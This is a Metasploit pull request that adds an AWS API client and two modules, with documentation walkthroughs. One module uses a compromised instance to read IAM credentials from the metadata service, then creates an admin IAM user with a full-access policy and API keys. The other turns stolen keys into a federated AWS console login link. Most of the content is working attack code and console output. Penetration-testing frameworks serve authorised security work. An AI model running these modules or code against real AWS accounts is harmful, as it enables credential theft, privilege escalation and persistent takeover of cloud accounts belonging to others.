### PR TITLE
Creates an AWS IAM User and Console Link

### DIFF
--- a/documentation/modules/auxiliary/gather/aws_console.md
+++ b/documentation/modules/auxiliary/gather/aws_console.md
@@ -1,0 +1,21 @@
+#aws_console
+
+Because sometimes we just need to show others that we have full control of an AWS account.
+
+```
+msf post(aws_create_iam_user) > use auxiliary/gather/aws_console
+msf auxiliary(aws_console) > set ACCESS_KEY AKIA...
+ACCESS_KEY => AKIA...
+msf auxiliary(aws_console) > set SECRET abc...
+SECRET => abc...
+msf auxiliary(aws_console) > run
+
+[*] Generating fed token
+[*] sts.amazonaws.com:443 - Connecting (sts.amazonaws.com)...
+[!] FederatedUser: {"Arn"=>"arn:aws:sts::097986286576:federated-user/Metasploit", "FederatedUserId"=>"097986286576:Metasploit"}
+[!] Credentials: {"AccessKeyId"=>"ASIA...", "SecretAccessKey"=>"...", "SessionToken"=>"...", "Expiration"=>"2016-11-22T11:29:44Z"}
+[!] PackedPolicySize: 4
+[+] Generated temp API keys stored at: /home/pwner/.msf4/loot/20161121232854_default_54.1.2.3_AKIA_833089.txt
+[+] Paste this into your browser: https://signin.aws.amazon.com/federation?Action=login&SigninToken=SIGNINTOKENIssuer=Metasploit&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/post/multi/escalate/aws_create_iam_user.md
+++ b/documentation/modules/post/multi/escalate/aws_create_iam_user.md
@@ -1,0 +1,113 @@
+# aws_create_iam_user
+
+aws_create_iam_user is a simple post module that can be used to take over AWS
+accounts. Sure, it is fun enough to take over a single host, but you can own all
+hosts in the account if you simply create an admin user.
+
+## Privileges
+This module depends on administrators being lazy and not using the least
+privileges possible. Only on rare cases should instances have the following
+privileges.
+
+* iam:CreateUser
+* iam:CreateGroup
+* iam:PutGroupPolicy
+* iam:AddUserToGroup
+* iam:CreateAccessKey
+
+## Establish a foothold
+You first need a foothold in AWS, e.g., here we use `sshexec` to get the
+foothold and launch a meterpreter session.
+
+```
+$ ./msfconsole
+...
+msf > use exploit/multi/ssh/sshexec
+msf exploit(sshexec) > set password some_user
+password => some_user
+msf exploit(sshexec) > set username some_user
+username => some_user
+msf exploit(sshexec) > set RHOST 192.168.1.2
+RHOST => 192.168.1.2
+msf exploit(sshexec) > set payload linux/x86/meterpreter/bind_tcp
+payload => linux/x86/meterpreter/bind_tcp
+msf exploit(sshexec) > exploit -j
+[*] Exploit running as background job.
+
+[*] Started bind handler
+msf exploit(sshexec) > [*] 192.168.1.2:22 - Sending stager...
+[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+[*] Command Stager progress -  42.09% done (306/727 bytes)
+[*] Command Stager progress - 100.00% done (727/727 bytes)
+[*] Sending stage (1495599 bytes) to 192.168.1.2
+[*] Meterpreter session 1 opened (192.168.1.1:33750 -> 192.168.1.2:4444) at 2016-11-21 17:58:42 +0000
+```
+
+We will be using session 1.
+
+```
+msf exploit(sshexec) > sessions
+
+Active sessions
+===============
+
+  Id  Type                   Information                                                                       Connection
+  --  ----                   -----------                                                                       ----------
+  1   meterpreter x86/linux  uid=50011, gid=50011, euid=50011, egid=50011, suid=50011, sgid=50011 @ ip-19-...  192.168.1.1:41634 -> 192.168.1.2:4444 (192.168.1.2)
+
+```
+
+## Create IAM User
+
+Now you can load `aws_create_iam_user` and specify a meterpreter sesssion,
+e.g., `SESSION 1`.
+
+```
+msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
+msf post(aws_create_iam_user) > set SESSION 1
+SESSION => 1
+msf post(aws_create_iam_user) > exploit
+
+[*] 169.254.169.254:80 - looking for creds...
+[*] Creating user: metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] Path: /
+[!] UserName: metasploit
+[!] Arn: arn:aws:iam::097986286576:user/metasploit
+[!] UserId: AIDA...
+[!] CreateDate: 2016-11-21T17:59:50.010Z
+[*] Creating group: metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] Path: /
+[!] GroupName: metasploit
+[!] Arn: arn:aws:iam::097986286576:group/metasploit
+[!] GroupId: AGPAIENI6YTM5JVRQ2452
+[!] CreateDate: 2016-11-21T17:59:50.554Z
+[*] Creating group policy: metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] xmlns: https://iam.amazonaws.com/doc/2010-05-08/
+[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
+[*] Adding user (metasploit) to group: metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] xmlns: https://iam.amazonaws.com/doc/2010-05-08/
+[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
+[*] Creating API Keys for metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] AccessKeyId: AKIA...
+[!] SecretAccessKey: THE SECRET ACCESS KEY...
+[!] AccessKeySelector: HMAC
+[!] UserName: metasploit
+[!] Status: Active
+[!] CreateDate: 2016-11-21T17:59:51.967Z
+[+] API keys stored at: /home/pwner/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
+[*] Post module execution completed
+msf post(aws_create_iam_user) > exit -y
+```
+
+You can see that the API keys stored in loot. Want console access, use [aws_console](../../gather/aws_console.md)
+
+```
+$ cat ~/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
+
+{"AccessKeyId":"AKIA...","SecretAccessKey":"THE SECRET ACCESS KEY...","AccessKeySelector":"HMAC","UserName":"metasploit","Status":"Active","CreateDate":"2016-11-21T17:59:51.967Z"}
+```

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -1,0 +1,173 @@
+
+require 'msf/core'
+require 'net/http'
+require 'openssl'
+
+module Metasploit
+  module Framework
+    module Aws
+      module Client
+        include Msf::Exploit::Remote::HttpClient
+        def register_autofilter_ports(ports=[]); end
+        def register_autofilter_hosts(ports=[]); end
+        def register_autofilter_services(services=[]); end
+
+        def metadata_creds
+          # TODO: do it for windows/generic way
+          if cmd_exec("curl --version") =~ /^curl \d/
+            url = "http://#{datastore['RHOST']}/2012-01-12/meta-data/"
+            print_status("#{peer} - looking for creds...")
+            resp = cmd_exec("curl #{url}")
+            if resp =~ /^iam.*/
+              resp = cmd_exec("curl #{url}iam/")
+              if resp =~ /^security-credentials.*/
+                resp = cmd_exec("curl #{url}iam/security-credentials/")
+                return JSON.parse(cmd_exec("curl #{url}iam/security-credentials/#{resp}"))
+              end
+            end
+          end
+          {}
+        end
+
+        def hexdigest(value)
+          digest = OpenSSL::Digest::SHA256.new
+          if value.respond_to?(:read)
+            chunk = nil
+            chunk_size = 1024 * 1024 # 1 megabyte
+            digest.update(chunk) while chunk = value.read(chunk_size)
+            value.rewind
+          else
+            digest.update(value)
+          end
+          digest.hexdigest
+        end
+
+        def hmac(key, value)
+          OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), key, value)
+        end
+
+        def hexhmac(key, value)
+          OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha256'), key, value)
+        end
+
+
+        def request_to_sign(headers, body_digest)
+          headers_block = headers.sort_by(&:first).map do |k,v|
+            v = "#{v},#{v}" if k == 'Host'
+            "#{k.downcase}:#{v}"
+          end.join("\n")
+          headers_list = headers.keys.sort.map(&:downcase).join(';')
+          flat_request = [ "POST", "/", '', headers_block + "\n", headers_list, body_digest].join("\n")
+          [headers_list, flat_request]
+        end
+
+
+        def sign(service, headers, body_digest, now)
+          date_mac = hmac("AWS4" + datastore['SECRET'], now[0, 8])
+          region_mac = hmac(date_mac, datastore['Region'])
+          service_mac = hmac(region_mac, service)
+          credentials_mac = hmac(service_mac, 'aws4_request')
+          headers_list, flat_request = request_to_sign(headers, body_digest)
+          doc = "AWS4-HMAC-SHA256\n#{now}\n#{now[0, 8]}/#{datastore['Region']}/#{service}/aws4_request\n#{hexdigest(flat_request)}"
+
+          signature = hexhmac(credentials_mac, doc)
+          [headers_list, signature]
+        end
+
+        def auth(service, headers, body_digest, now)
+          headers_list, signature = sign(service, headers, body_digest, now)
+          "AWS4-HMAC-SHA256 Credential=#{datastore['ACCESS_KEY']}/#{now[0, 8]}/#{datastore['Region']}/#{service}/aws4_request, SignedHeaders=#{headers_list}, Signature=#{signature}"
+        end
+
+        def body(vars_post)
+          pstr = ""
+          vars_post.each_pair do |var,val|
+            pstr << '&' if pstr.length > 0
+            pstr << var
+            pstr << '='
+            pstr << val
+          end
+          pstr
+        end
+
+        def headers(service, body_digest, body_length)
+          now = Time.now.utc.strftime("%Y%m%dT%H%M%SZ")
+          headers = {
+            'Content-Type' => 'application/x-www-form-urlencoded; charset=utf-8',
+            'Accept-Encoding' => '',
+            'User-Agent' => "Metasploit #{Metasploit::Framework::VERSION} (jg)",
+            'X-Amz-Date' => now,
+            'Host' => datastore['RHOST'],
+            'X-Amz-Content-Sha256' => body_digest,
+            'Accept' => '*/*'
+          }
+          headers['X-Amz-Security-Token'] = datastore['TOKEN'] if datastore['TOKEN']
+          sign_headers = ['Content-Type', 'Host', 'User-Agent', 'X-Amz-Content-Sha256', 'X-Amz-Date']
+          auth_headers = headers.select { |k, _| sign_headers.include?(k) }
+          headers['Authorization'] = auth(service, auth_headers, body_digest, now)
+          headers
+        end
+
+        def print_hsh(hsh)
+          hsh.each do |key, value|
+            print_warning "#{key}: #{value}"
+          end
+        end
+
+        def print_results(doc, action)
+          response = "#{action}Response"
+          result = "#{action}Result"
+          resource = /[A-Z][a-z]+([A-Za-z]+)/.match(action)[1]
+
+          if doc["ErrorResponse"] && doc["ErrorResponse"]["Error"]
+            print_error doc["ErrorResponse"]["Error"]["Message"]
+            return nil
+          end
+
+          idoc = doc[response] if doc[response]
+          idoc = idoc[result] if idoc[result]
+          idoc = idoc[resource] if idoc[resource]
+
+          if idoc["member"]
+            idoc["member"].each do |x|
+              print_hsh x
+            end
+          else
+            print_hsh idoc
+          end
+          idoc
+        end
+
+        def call_api(service, api_params)
+          print_status("#{peer} - Connecting (#{datastore['RHOST']})...")
+          body = body(api_params)
+          body_length = body.length
+          body_digest = hexdigest(body)
+          res = send_request_raw(
+            'method' => 'POST',
+            'data' => body,
+            'headers' => headers(service, body_digest, body_length)
+          )
+          Hash.from_xml(res.body)
+        rescue => e
+          print_error e.message
+        end
+
+        def call_iam(api_params)
+          api_params['Version'] = '2010-05-08' unless api_params['Version']
+          call_api('iam', api_params)
+        end
+
+        def call_ec2(api_params)
+          api_params['Version'] = '2015-10-01' unless api_params['Version']
+          call_api('ec2', api_params)
+        end
+
+        def call_sts(api_params)
+          api_params['Version'] = '2011-06-15' unless api_params['Version']
+          call_api('sts', api_params)
+        end
+      end
+    end
+  end
+end

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -14,7 +14,7 @@ module Metasploit
           cmd_out = cmd_exec("curl --version")
           if cmd_out =~ /^curl \d/
             url = "http://#{datastore['METADATA_IP']}/2012-01-12/meta-data/"
-            print_status("#{peer} - looking for creds...")
+            print_status("#{datastore['METADATA_IP']} - looking for creds...")
             resp = cmd_exec("curl #{url}")
             if resp =~ /^iam.*/
               resp = cmd_exec("curl #{url}iam/")
@@ -138,7 +138,7 @@ module Metasploit
           idoc
         end
 
-        def call_api(creds, opts, service, api_params)
+        def call_api(creds, service, api_params)
           print_status("#{peer} - Connecting (#{datastore['RHOST']})...")
           body = body(api_params)
           body_length = body.length

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -13,7 +13,7 @@ module Metasploit
           # TODO: do it for windows/generic way
           cmd_out = cmd_exec("curl --version")
           if cmd_out =~ /^curl \d/
-            url = "http://#{datastore['RHOST']}/2012-01-12/meta-data/"
+            url = "http://#{datastore['METADATA_IP']}/2012-01-12/meta-data/"
             print_status("#{peer} - looking for creds...")
             resp = cmd_exec("curl #{url}")
             if resp =~ /^iam.*/

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -14,7 +14,8 @@ module Metasploit
 
         def metadata_creds
           # TODO: do it for windows/generic way
-          if cmd_exec("curl --version") =~ /^curl \d/
+          cmd_out = cmd_exec("curl --version")
+          if cmd_out =~ /^curl \d/
             url = "http://#{datastore['RHOST']}/2012-01-12/meta-data/"
             print_status("#{peer} - looking for creds...")
             resp = cmd_exec("curl #{url}")
@@ -25,6 +26,8 @@ module Metasploit
                 return JSON.parse(cmd_exec("curl #{url}iam/security-credentials/#{resp}"))
               end
             end
+          else
+            print_error cmd_out
           end
           {}
         end

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -1,6 +1,3 @@
-
-require 'msf/core'
-require 'net/http'
 require 'openssl'
 
 module Metasploit

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -95,7 +95,7 @@ module Metasploit
           headers = {
             'Content-Type' => 'application/x-www-form-urlencoded; charset=utf-8',
             'Accept-Encoding' => '',
-            'User-Agent' => "Metasploit #{Metasploit::Framework::VERSION} (jg)",
+            'User-Agent' => "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15",
             'X-Amz-Date' => now,
             'Host' => datastore['RHOST'],
             'X-Amz-Content-Sha256' => body_digest,
@@ -143,14 +143,16 @@ module Metasploit
           body = body(api_params)
           body_length = body.length
           body_digest = hexdigest(body)
-          res = send_request_raw(
-            'method' => 'POST',
-            'data' => body,
-            'headers' => headers(service, body_digest, body_length)
-          )
-          Hash.from_xml(res.body)
-        rescue => e
-          print_error e.message
+          begin
+            res = send_request_raw(
+              'method' => 'POST',
+              'data' => body,
+              'headers' => headers(service, body_digest, body_length)
+            )
+            Hash.from_xml(res.body)
+          rescue => e
+            print_error e.message
+          end
         end
 
         def call_iam(api_params)

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -149,7 +149,11 @@ module Metasploit
               'data' => body,
               'headers' => headers(creds, service, body_digest, body_length)
             )
-            Hash.from_xml(res.body)
+            if res.nil?
+              print_error "#{peer} did not respond"
+            else
+              Hash.from_xml(res.body)
+            end
           rescue => e
             print_error e.message
           end

--- a/modules/auxiliary/gather/aws_console.rb
+++ b/modules/auxiliary/gather/aws_console.rb
@@ -1,0 +1,72 @@
+require 'msf/core'
+require 'metasploit/framework/aws/client'
+
+class MetasploitModule < Msf::Auxiliary
+  include Metasploit::Framework::Aws::Client
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "AWS Console",
+      'Description'    => %q{
+        This module will print a URL to open the AWS console given valid AWS API access keys.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => ['Javier Godinez <godinezj[at]gmail.com>']
+    ))
+
+    register_options(
+      [
+        OptString.new('AWS_STS_ENDPOINT', [true, 'AWS STS Endpoint', 'sts.amazonaws.com']),
+        OptString.new('AWS_STS_ENDPOINT_PORT', [true, 'AWS STS Endpoint TCP Port', 443]),
+        OptString.new('AWS_STS_ENDPOINT_SSL', [true, 'AWS STS Endpoint SSL', true]),
+        OptString.new('ACCESS_KEY', [true, 'AWS access key', '']),
+        OptString.new('SECRET', [true, 'AWS secret key', '']),
+        OptString.new('CONSOLE_NAME', [true, 'The AWS console name', 'Metasploit']),
+        OptString.new('Region', [true, 'The default region', 'us-east-1' ])
+      ], self.class)
+    deregister_options('RHOST', 'RPORT', 'SSL', 'VHOST')
+  end
+
+
+  def run
+    print_status("Generating fed token")
+    action = 'GetFederationToken'
+    policy = '{"Version": "2012-10-17", "Statement": [{"Action": "*","Effect": "Allow", "Resource": "*" }]}'
+    datastore['RHOST'] = datastore['AWS_STS_ENDPOINT']
+    datastore['RPORT'] = datastore['AWS_STS_ENDPOINT_PORT']
+    datastore['SSL'] = datastore['AWS_STS_ENDPOINT_SSL']
+    doc = call_sts('Action' => action, 'Name' => datastore['CONSOLE_NAME'], 'Policy' => URI.encode(policy))
+    doc = print_results(doc, action)
+    return if doc.nil?
+    path = store_loot(datastore['ACCESS_KEY'], 'text/plain', datastore['RHOST'], doc.to_json)
+    print_good("Generated temp API keys stored at: " + path)
+
+    creds = doc.fetch('Credentials')
+    session_json = {
+      sessionId: creds.fetch('AccessKeyId'),
+      sessionKey: creds.fetch('SecretAccessKey'),
+      sessionToken: creds.fetch('SessionToken')
+    }.to_json
+
+    datastore['RHOST'] = 'signin.aws.amazon.com'
+    datastore['RPORT'] = 443
+    datastore['SSL'] = true
+    resp = send_request_raw(
+      'method'   => 'GET',
+      'uri'      => '/federation?Action=getSigninToken' + "&SessionType=json&Session=" + CGI.escape(session_json)
+    )
+    if resp.code != 200
+      print_err("Error generating console login")
+      print_error(res.body)
+      return
+    end
+    resp_json = JSON.parse(resp.body)
+    signin_token = resp_json['SigninToken']
+    signin_token_param = "&SigninToken=" + CGI.escape(signin_token)
+    issuer_param = "&Issuer=" + CGI.escape(datastore['CONSOLE_NAME'])
+    destination_param = "&Destination=" + CGI.escape("https://console.aws.amazon.com/")
+    login_url = "https://signin.aws.amazon.com/federation?Action=login" + signin_token_param + issuer_param + destination_param
+
+    print_good("Paste this into your browser: #{login_url}")
+  end
+end

--- a/modules/auxiliary/gather/aws_console.rb
+++ b/modules/auxiliary/gather/aws_console.rb
@@ -70,3 +70,4 @@ class MetasploitModule < Msf::Auxiliary
     print_good("Paste this into your browser: #{login_url}")
   end
 end
+

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -39,66 +39,55 @@ class MetasploitModule < Msf::Post
 
   def run
     # setup creds for making IAM API calls
-    c = tmp_creds
-    datastore['ACCESS_KEY'] = c.fetch('AccessKeyId', datastore['ACCESS_KEY'])
-    datastore['SECRET'] = c.fetch('SecretAccessKey', datastore['SECRET'])
-    datastore['TOKEN'] = c.fetch('Token', datastore['TOKEN'])
-    datastore['RHOST'] = datastore['AWS_IAM_ENDPOINT']
-    datastore['RPORT'] = datastore['AWS_IAM_ENDPOINT_PORT']
-    datastore['SSL'] = datastore['AWS_IAM_ENDPOINT_SSL']
-    if c['AccessKeyId'].nil? || c['AccessKeyId'].empty?
-      print_error("Clould not find creds")
-      return
+    creds = metadata_creds
+    if datastore['ACCESS_KEY'].empty?
+      if creds['AccessKeyId'].nil?
+        print_error("Clould not find creds")
+        return
+      end
+    else
+      creds = {
+        'AccessKeyId' => datastore['AccessKeyId'],
+        'SecretAccessKey' => datastore['SecretAccessKey'],
+        'Token' => datastore['Token']
+      }
     end
 
     # create user
     username = datastore['IAM_USERNAME']
     print_status("Creating user: #{username}")
     action = 'CreateUser'
-    doc = call_iam('Action' => action, 'UserName' => username)
+    doc = call_iam(creds, 'Action' => action, 'UserName' => username)
     print_results(doc, action)
 
     # create group
     print_status("Creating group: #{username}")
     action = 'CreateGroup'
-    doc = call_iam('Action' => action, 'GroupName' => username)
+    doc = call_iam(creds, 'Action' => action, 'GroupName' => username)
     print_results(doc, action)
 
     # create group policy
     print_status("Creating group policy: #{username}")
     pol_doc = datastore['IAM_GROUP_POL']
     action = 'PutGroupPolicy'
-    doc = call_iam('Action' => action, 'GroupName' => username, 'PolicyName' => username, 'PolicyDocument' => URI.encode(pol_doc))
+    doc = call_iam(creds, 'Action' => action, 'GroupName' => username, 'PolicyName' => username, 'PolicyDocument' => URI.encode(pol_doc))
     print_results(doc, action)
 
     # add user to group
     print_status("Adding user (#{username}) to group: #{username}")
     action = 'AddUserToGroup'
-    doc = call_iam('Action' => action, 'UserName' => username, 'GroupName' => username)
+    doc = call_iam(creds, 'Action' => action, 'UserName' => username, 'GroupName' => username)
     print_results(doc, action)
 
     # create API keys
     print_status("Creating API Keys for #{username}")
     action = 'CreateAccessKey'
-    doc = call_iam('Action' => action, 'UserName' => username)
+    doc = call_iam(creds, 'Action' => action, 'UserName' => username)
     doc = print_results(doc, action)
 
     return if doc.nil?
     path = store_loot(doc['AccessKeyId'], 'text/plain', datastore['RHOST'], doc.to_json)
     print_good("API keys stored at: " + path)
-  end
-
-  def tmp_creds
-    # setup http client required params
-    datastore['RHOST'] = datastore['METADATA_IP']
-    datastore['RPORT'] = datastore['METADATA_PORT']
-    datastore['SSL'] = datastore['METADATA_SSL']
-    # call to metadata service should not be proxied, it is always local
-    proxies = datastore['Proxies']
-    datastore['Proxies'] = nil
-    creds = metadata_creds
-    datastore['Proxies'] = proxies
-    creds
   end
 end
 

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Post
   def run
     # setup creds for making IAM API calls
     creds = metadata_creds
-    if datastore['ACCESS_KEY'].empty?
+    if datastore['AccessKeyId'].empty?
       if creds['AccessKeyId'].nil?
         print_error("Clould not find creds")
         return

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -1,0 +1,103 @@
+require 'msf/core'
+require 'metasploit/framework/aws/client'
+
+class MetasploitModule < Msf::Post
+  
+  include Metasploit::Framework::Aws::Client
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Create an AWS IAM User",
+      'Description'    => %q{
+        This module will attempt to create an AWS (Amazon Web Services) IAM
+        (Identity and Access Management) user with Admin privileges.
+      },
+      'License'        => MSF_LICENSE,
+      'Platform'      => %w(unix),
+      'SessionTypes'  => %w(shell meterpreter),
+      'Author'         => ['Javier Godinez <godinezj[at]gmail.com>']
+    ))
+
+    register_options(
+      [
+        OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
+        OptString.new('METADATA_PORT', [true, 'The metadata service TCP port', 80]),
+        OptString.new('METADATA_SSL', [true, 'Metadata service SSL', false]),
+        OptString.new('AWS_IAM_ENDPOINT', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
+        OptString.new('AWS_IAM_ENDPOINT_PORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
+        OptString.new('AWS_IAM_ENDPOINT_SSL', [true, 'AWS IAM Endpoint SSL', true]),
+        OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
+        OptString.new('IAM_USERNAME', [true, 'Username for the user to be created', 'metasploit']),
+        OptString.new('ACCESS_KEY', [false, 'AWS access key', '']),
+        OptString.new('SECRET', [false, 'AWS secret key', '']),
+        OptString.new('TOKEN', [false, 'AWS session token', '']),
+        OptString.new('Region', [true, 'The default region', 'us-east-1' ])
+      ], self.class)
+    deregister_options('RHOST', 'RPORT', 'SSL', 'VHOST')
+  end
+
+
+  def run
+    # setup creds for making IAM API calls
+    c = tmp_creds
+    datastore['ACCESS_KEY'] = c.fetch('AccessKeyId', datastore['ACCESS_KEY'])
+    datastore['SECRET'] = c.fetch('SecretAccessKey', datastore['SECRET'])
+    datastore['TOKEN'] = c.fetch('Token', datastore['TOKEN'])
+    datastore['RHOST'] = datastore['AWS_IAM_ENDPOINT']
+    datastore['RPORT'] = datastore['AWS_IAM_ENDPOINT_PORT']
+    datastore['SSL'] = datastore['AWS_IAM_ENDPOINT_SSL']
+    if c['AccessKeyId'].nil? || c['AccessKeyId'].empty?
+      print_error("Clould not find creds")
+      return
+    end
+
+    # create user
+    username = datastore['IAM_USERNAME']
+    print_status("Creating user: #{username}")
+    action = 'CreateUser'
+    doc = call_iam('Action' => action, 'UserName' => username)
+    print_results(doc, action)
+
+    # create group
+    print_status("Creating group: #{username}")
+    action = 'CreateGroup'
+    doc = call_iam('Action' => action, 'GroupName' => username)
+    print_results(doc, action)
+
+    # create group policy
+    print_status("Creating group policy: #{username}")
+    pol_doc = datastore['IAM_GROUP_POL']
+    action = 'PutGroupPolicy'
+    doc = call_iam('Action' => action, 'GroupName' => username, 'PolicyName' => username, 'PolicyDocument' => URI.encode(pol_doc))
+    print_results(doc, action)
+
+    # add user to group
+    print_status("Adding user (#{username}) to group: #{username}")
+    action = 'AddUserToGroup'
+    doc = call_iam('Action' => action, 'UserName' => username, 'GroupName' => username)
+    print_results(doc, action)
+
+    # create API keys
+    print_status("Creating API Keys for #{username}")
+    action = 'CreateAccessKey'
+    doc = call_iam('Action' => action, 'UserName' => username)
+    doc = print_results(doc, action)
+
+    return if doc.nil?
+    path = store_loot(doc['AccessKeyId'], 'text/plain', datastore['RHOST'], doc.to_json)
+    print_good("API keys stored at: " + path)
+  end
+
+  def tmp_creds
+    # setup http client required params
+    datastore['RHOST'] = datastore['METADATA_IP']
+    datastore['RPORT'] = datastore['METADATA_PORT']
+    datastore['SSL'] = datastore['METADATA_SSL']
+    # call to metadata service should not be proxied, it is always local
+    proxies = datastore['Proxies']
+    datastore['Proxies'] = nil
+    creds = metadata_creds
+    datastore['Proxies'] = proxies
+    creds
+  end
+end

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -21,19 +21,20 @@ class MetasploitModule < Msf::Post
     register_options(
       [
         OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
-        OptString.new('METADATA_PORT', [true, 'The metadata service TCP port', 80]),
-        OptString.new('METADATA_SSL', [true, 'Metadata service SSL', false]),
-        OptString.new('AWS_IAM_ENDPOINT', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
-        OptString.new('AWS_IAM_ENDPOINT_PORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
-        OptString.new('AWS_IAM_ENDPOINT_SSL', [true, 'AWS IAM Endpoint SSL', true]),
+        OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
+        OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
+        OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
         OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
         OptString.new('IAM_USERNAME', [true, 'Username for the user to be created', 'metasploit']),
-        OptString.new('ACCESS_KEY', [false, 'AWS access key', '']),
-        OptString.new('SECRET', [false, 'AWS secret key', '']),
-        OptString.new('TOKEN', [false, 'AWS session token', '']),
         OptString.new('Region', [true, 'The default region', 'us-east-1' ])
-      ], self.class)
-    deregister_options('RHOST', 'RPORT', 'SSL', 'VHOST')
+      ])
+    register_advanced_options(
+      [
+        OptString.new('AccessKeyId', [false, 'AWS access key', '']),
+        OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
+        OptString.new('Token', [false, 'AWS session token', ''])
+      ])
+    deregister_options('VHOST')
   end
 
 

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -2,7 +2,7 @@ require 'msf/core'
 require 'metasploit/framework/aws/client'
 
 class MetasploitModule < Msf::Post
-  
+
   include Metasploit::Framework::Aws::Client
 
   def initialize(info={})
@@ -101,3 +101,4 @@ class MetasploitModule < Msf::Post
     creds
   end
 end
+


### PR DESCRIPTION
* Adds generic Amazon Web Services (AWS) client
* Escalates privs by creating an admin user in compromised AWS account
* Generates a URL that can be pasted into a browser to open the AWS console

## Verification

Given a meterpreter session to an AWS instance having weak privs, do:

```
msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
msf post(aws_create_iam_user) > set SESSION 1
SESSION => 1
msf post(aws_create_iam_user) > exploit
```

see loot, e.g., $ cat ~/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt

```
msf post(aws_create_iam_user) > use auxiliary/gather/aws_console
msf auxiliary(aws_console) > set ACCESS_KEY AKIA...
ACCESS_KEY => AKIA...
msf auxiliary(aws_console) > set SECRET abc...
SECRET => abc...
msf auxiliary(aws_console) > run
...
[+] Paste this into your browser: https://signin.aws.amazon.com/federation?Action=login&SigninToken=SIGNINTOKENIssuer=Metasploit&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F
```

Paste the output into the browser. Browser should display a logged in session.
